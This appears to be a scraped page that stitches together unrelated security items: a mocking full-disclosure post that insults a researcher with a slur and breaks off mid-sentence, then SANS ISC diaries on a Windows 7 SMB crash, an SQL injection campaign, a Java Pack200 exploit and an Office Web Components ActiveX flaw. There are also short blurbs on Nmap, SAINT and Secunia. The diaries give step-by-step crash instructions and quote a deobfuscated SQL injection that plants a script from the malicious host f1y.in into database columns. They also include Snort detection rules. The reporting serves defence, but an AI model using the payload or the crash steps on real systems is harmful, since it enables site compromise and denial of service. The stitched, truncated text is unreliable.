The Glider

Posted by Григорий Братислава on Feb 17

Hello full-disclosure!!

I is like to warn you about rhetoric and annoyance nuisance. Is once
upon a time MustLive has maybe is one exploit to is make me say "черт
возьми!" howisever MustLive is how you say? pička in Crotia.

Is I top post for annoy:

1) MustLive is lonely pička with is one to many copy of cracked
Accunetix is run in background to report to full disclosure (hi is
look at me, I find vuln no one is care...

Microsoft is downplaying the threat posed to Windows users by a recently-revealed vulnerability, saying it's unlikely the bug could be exploited to compromise a computer.

The hactivist group Anonymous used a series of simple technical and social exploits to crack the network of security-technology firm HBGary Federal, giving the company a schooling that other network security pros can learn from.

Mikael wrote us yesterday, telling us about a site claiming to have a zero day for SMBon both Windows 7 and Windows Server 2008 R2. Thanks for the pointer Mikael, Laurent Gaffi is the original author of this bit of code.
However, after a first try, we found that the code didn't run as posted. Nothing major, one required line of code was missing, and some formatting issues. Given what this code does, these omissions might have been intentional, to give Microsoft a chance to get a fix in before this disseminates. The code does in fact work. The sequence to see the exploit is:
1/ On a linux machine, ensure that port 445 is open or that your firewall is down - ensure that the target windows host and the linux host have connectivity (a quick ping does the trick here)
2/ On that linux box, run the resulting code - sudo python w7spolit.py . Note that you need sudo to open a tcp service, and we're using a linux box for this because of course port 445 is taken on most windows hosts.
3/ On the target Windows box, do a net use x.x.x.x, where x.x.x.x is the ip address of the linux box.
You'll see that the Windows host is now frozen - no mouse, no keyboard, and completely unresponsive on the network as well. This works on both Windows 7 and Windows Server 2008 R2, with the very latest patches applied. A link to a server running this code could easily be embedded in a web page or email, pointing out to a poisonhost on the internet - so this exploit is not isolated to corporate networks doing file sharing. As the author states, disabling SMBv2 does not give even temporary protection. Here's hoping Microsoft scrambles the troops to get this patched before it's out in the wild.
==========================================================================================================================
Since the original post, there's been a lot of QA back and forth, and also some mis-information floating around as well, I'm hoping that the QA below helps clarify things:



Is the original Windows 2008 affected by this?

No - the only 2 affected operating systems are Windows 7 and Windows 2008 R2



What patch levels have been tested? Is this a problem in one patch or another?

We've only tested the 2 affected operating systems, fully patched as of 12 Nov 2009.



If I disable SMBv2, I'm not affected right?

Wrong. This affects hosts whatever version of SMB they are running. We've tested hosts with SMBv2 disabled with both the registry method and the sc method (singly and in combination), and all are equally affected.



How does this thing spread?

It has no mechanism for propagation. Unless somebody embeds this in a worm, this is more of a curiosity than anything else. This vulnerability in itself does not have the potential to steal information or compromise system integrity. It crashes hosts, plain and simple.



Is IPv6 affected? Is this an IPv6 problem?

This is an SMB issue (tcp/445). All testing so far has been on IPv4, we haven't tested IPv6 specifically, but there's no reason to think that running SMB over IPv6 would behave any differently



What about the firewall on windows? Does that help?

Remember that this works by you browsing to a UNC on a poison host. The windows firewall has no affect on this



How can I mitigate against this in Windows? Is there a registry key or a patch I can apply?

At this time, there is no host based mitigation available. We're hoping that Microsoft comes out with a patch for this quickly. Your best protection is the same safe computing advice that we'd give any other day:

Don't browse from your servers. Ever.
Don't browse indiscriminately from your workstation (don't click links from strangers).
Don't browse to UNC's that aren't under your control (i.e. on the public internet). Ever.



Can I protect myself in any way?

YES. Your best protection in a corporation is an egress filter on your firewall. This has been a long-standing recommendation, and not just from SANS. There is no reason you should browse to Microsoft file sharing ports on the internet, so blocking this activity outbound on a corporate firewall is a great way to knock this problem on the head, at least as far as your corporation is concerned. Egress filters are also a wonderful way to stop the propagation (both inbound and outbound) of other malware. There are a number of papers in the SANS Reading Room ( http://www.sans.org/reading_room/ ) that deal with this subject if you want more info.



Why haven't you post a link to the original code?

As a policy, ISC simply can't post links to zero day code. We need to report this as an important story, getting the word out to prevent the spread of FUD is key in situations like this. However, pointing to the author's blog just wouldn't be responsible. If you'd like to try this code out yourself, most search engines should be able to help you with that.





Finally, remember again that this is not like the vulnerabilities that have recently seen widespread adoption by malware. This vulnerability does not infectWindows, it simply crashes the host. Crashing hosts is not good business for criminals - remember, they write their malware to make money, and crashing your victim's host does not make any money most days. Also, it requires action by someone on the target host - they need to browse to a UNC resource on the attacker's poison host. While this vulnerability is a serious issue, I can't see a good reason for malware authors to include it in their suite. I don't expect that we'll see widespread use of this in the wild (except on security blogs of course ...)

One of the must have tools for every person doing anything related to IT security is definitely Nmap (I mean, which other tool, besides an SSH exploit Trinity used as well (and that wasn't a fake SSH exploit like the one released couple of days ago)). The Nmap developers work hard on this latest version which includes some very cool things like the Nmap Scripting Engine (NSE) which we even used to detect machines infected with the Conficker worm.



There are a lot of other neat new features and improvements, so don't wait and go tohttp://nmap.org/5/ to download your copy of Nmap.



--

Bojan

As we thought, it was just a matter of time before more attackers start exploiting the still unpatched Office Web Components vulnerability.



While a day ago reports of exploits for this vulnerability were still a bit rare, yesterday Ken Hoover sent a log of an SQL injection attempt to his web site. The SQL injection attempt looks very much like the one we've been seeing for month

SET @S=CAST(0x44004500430



After deobfuscation of the CAST function input, the following SQL code is revealed:



DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''script src=hxxp://f1y.in/j.js/script''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor



As you can see, they are injecting a script code pointing to f1y.in, which is a known bad domain. This script contains links to two other web sites (www.jatrja.com and js.tongji.linezing.com) serving malicious JavaScript that, besides exploits for some older vulnerabilities, also include the exploit for the OWC vulnerability.



The exploits end up downloading a Trojan (of course, what else) which currently has pretty bad detection (VT link) only 15 AV programs detecting it, luckily, some major AV vendors are there.



If you haven't set those killbits yet, be sure that you do know because the number of sites exploiting this vulnerability will probably rise exponentially soon.



--

Bojan

One of our readers, Tom Ueltschi, sent an e-mail with details about an exploit that is exploiting a Java vulnerability. While such exploits are not rare, this particular exploit targeted a vulnerability that was published in December 2008 by iDefense, and a reliable exploit became publicly available couple of months ago, in April this year.



However, it took some time for the bad guys to start using this exploit in their attack kits. The vulnerability exists in Java JRE release 6, in update versions lower than 13 and release 5, update versions lower than 18.



The vulnerability exists in the Pack200 compression method, which is used to compress Jar files. The compression method is called when reading a Pack200 compressed file the exploit creates an Applet which downloads a special crafted Pack200 compressed file. It's interesting how the attackers completely copied the publicly available exploit (they even used the same file names!), so they end up using an HTML file that creates the Applet, which further calls a PHP script called e.php that is needed to correctly set the Content-Encoding header:







?



The Applet contains shellcode, which gets executed if the vulnerability is successfully exploited as you can guess it downloads a Trojan which, luckily, has *some* detection (VT link) with some major names still missing it.

After checking the malicious web site, it became obvious that the exploit has been integrated with an attack kit, so we can expect this to become more common now.



Finally, I'd like to remind every to double check that you have the latest Java installed on your machine (and those older versions removed). Also, don't forget about those nice addons such as NoScript which can limit your exposure by allowing Java or JavaScript to execute only on trusted web sites and not by default.



--

Bojan

Update1: The vulnerability is being actively exploited on web sites. More to follow.
Microsoft has released an advisory related to an Office Web Components ActiveX vulnerability, it is available here. This vulnerability exists in the ActiveX control used by IE to display Excel spreadsheets. The CVE entry for the vulnerability is CVE-2009-1136. Microsoft mentions that they are aware of active exploits against this vulnerability, although we at the SANS Internet Storm Center haven't seen it used or mentioned in public as of yet (this has changed, we are seeing active exploit pages). Which may tend to indicate it has been used in targeted rather than broad based attacks. At the moment there is no patch, there is a workaround, and it can be automated for enterprise deployment. The specific CLSIDs to set the killbit for are:
{0002E541-0000-0000-C000-000000000046}

{0002E559-0000-0000-C000-000000000046}
Start working on this on ASAP. The impact is remote code execution with the privileges of the logged in user running Internet Explorer, and might not require user intervention. As in browse to a nasty web site and be pwn3d.
Advisory: http://www.microsoft.com/technet/security/advisory/973472.mspx
KB article: http://support.microsoft.com/kb/973472
SRD blog: http://blogs.technet.com/srd/archive/2009/07/13/more-information-about-the-office-web-components-activex-vulnerability.aspx
MSRC blog: http://blogs.technet.com/msrc/archive/2009/07/13/microsoft-security-advisory-973472-released.aspx
There is a long list of affected products:

Microsoft Office XP Service Pack 3;
Microsoft Office 2003 Service Pack 3;
Microsoft Office XP Web Components Service Pack 3;
Microsoft Office Web Components 2003 Service Pack 3;
Microsoft Office 2003 Web Components for the and
Microsoft Office Small Business Accounting 2006.

For information on how to prevent ActiveX controls from running check out this Microsoft KB article on modifying the registry. This article describes how to deploy using Active Directory. If you have administrative privileges on a single system and are running Internet Explorer, you can click on this 'fixit' link to set the killbit and mitigate the vulnerability on a home computer for example.
Update1: The vulnerability is being actively exploited on web sites. More to follow.
Update2: One other obvious mitigation step is to use an alternate web browser (as in other than IE) that does not make use of ActiveX.
Update3: We have raised the Infocon to yellow for 24 hours due to the active exploitation of this vulnerability.
Update4:We will be updating our existing diary post of domains to block with domains that are hosting this exploit as well. You can see that diary entry at the following url. http://isc.sans.org/diary.html?storyid=6739 (newly added domains are in yellow) - AndreL
Update5: Attack vectors used to exploit this vulnerability.

The now known public attempts to exploit the vulnerability, attackers just modify the code with a fresh download and payload to slightly modified malware.
A .cn domain using a heavily obfuscated version of the exploit - which may become an attack kit (think MPACK)and is similar to recent DirectShow attacks.
A highly targeted attack against an organization earlier today who received a Microsoft Office document with embedded HTML. This one was particularly nasty, it was specifically crafted for the target - with the document being tailored with appropriate contact information and subject matter that were specific to the targeted recipient. Analysis of the document and secondary payload found the attacker used a firewall on the malicious server so that all IP traffic outside of the targeted victim's domain/IP range would not reach with the server.

Update6: This blog has additional information, with examples of code that may have been used in this attack. hxxp://safelab.spaces.live.com/blog/cns!A6B213403DBD59AF!1463.entry (obscured on purpose, some AV products will trigger accessing the page. Another example is here: hxxp://xeye.us/blog/2009/07/one-0day/
One part of a signature looking for the exploit would be ActiveXObject(OWC10.Spreadsheet), which could also be used for legitimate web applications trying to open a spreadsheet.
Update7: attempt at snort sigs (until something better comes along):
alert tcp $EXTERNAL_NET $HTTP_PORTS - $HOME_NET any (msg:MS 0day Excel ActiveX1 CVE-2009-1136 ref isc.sans.org/diary.html?storyid=6778 content:0002E559-0000-0000-C000-000000000046 pcre:/OBJECTs+[^]*classids*=s*[x22x27]?s*clsids*x3as* x7B?s*0002E559-0000-0000-C000-000000000046/si)



alert tcp $EXTERNAL_NET $HTTP_PORTS - $HOME_NET any (msg:MS 0day Excel ActiveX2 CVE-2009-1136 ref isc.sans.org/diary.html?storyid=6778 content:0002E541-0000-0000-C000-000000000046 pcre:/OBJECTs+[^]*classids*=s*[x22x27]?s*clsids*x3as* x7B?s*0002E541-0000-0000-C000-000000000046/si)
Update8: Metasploit have released a module exploiting the vulnerability.
Update9: Matt Hrynkow and John Silvestri have submitted .ADM files for use in Active Directory GPO templates for setting the ActiveX killbits for last week's and this weeks vulnerabilities. Here is the one for The MS Office Web Object 973472 CVE-2009-1136.
--Start here--
CLASS MACHINE



CATEGORY Windows Components



CATEGORY Internet Explorer

POLICY Internet Explorer - ActiveX Compatibility Disable for Microsoft Office Web Components

#if version = 3

EXPLAIN !!EXPLAIN1

#endif

KEYNAME SOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{011B3619-FE63-4814-8A84-15A194CE9CE3}

VALUENAME Compatibility Flags

VALUEON NUMERIC 1024

VALUEOFF NUMERIC 0

ACTIONLISTON

KEYNAME SOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0002E541-0000-0000-C000-000000000046}

VALUENAME Compatibility Flags VALUE NUMERIC 1024

KEYNAME SOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0002E559-0000-0000-C000-000000000046}

VALUENAME Compatibility Flags VALUE NUMERIC 1024

END ACTIONLISTON

ACTIONLISTOFF

KEYNAME SOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0002E541-0000-0000-C000-000000000046}

VALUENAME Compatibility Flags VALUE NUMERIC 0

KEYNAME SOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0002E559-0000-0000-C000-000000000046}

VALUENAME Compatibility Flags VALUE NUMERIC 0

END ACTIONLISTOFF

Internet Explorer - ActiveX Compatibility Disable for OWC10_and_OWC11



Windows Components



CLASS USER

[Strings]

EXPLAIN1 =Enable this policy to implement workaround documented for Microsoft Security Advisory (973472)nnnhttp://www.microsoft.com/technet/security/advisory/973472.mspxnhttp://isc.sans.org/diary.html?storyid=6778n

--End here--
Update10: This MSDN blog has 32 and 64 bit versions of the Active Directory GPO ADM files and .reg files that should mitigate this vulnerability: http://blogs.msdn.com/askie/archive/2009/07/14/group-policy-adm-template-to-implement-the-workaround-from-security-advisory-973472.aspx The one posted above in Update9 apparently only works on 32 bit, and is missing the backslashes. Thanks Jim and Brian for letting us know.



If you see exploit code for this vulnerability, or have knowledge of it being used in an attack please let us know via our contact page.
Thanks to all who have contributed to this diary!
Cheers,

Adrien de Beaupr

EWA-Canada.com
Teaching SANS Cutting-Edge Hacking Techniques in Ottawa this September.

SAINT is the Security Administrator's Integrated Network Tool. It is used to non-intrusively detect security vulnerabilities on any remote target, including servers, workstations, networking devices, and other types of nodes. It will also gather information such as operating system types and open ports. The SAINT graphical user interface provides access to SAINT's data management, scan configuration, scan scheduling, and data analysis capabilities through a web browser. Different aspects of (...) - Security Tools / Saint, Automated Exploiter, Application Scanner, Vulnerability Management

Ubuntu has issued an update for the kernel. This fixes some vulnerabilities, which can be exploited by malicious, local users to bypass certain security restrictions and gain escalated privileges, and by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

http://secunia.com/Advisories/32918/

NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/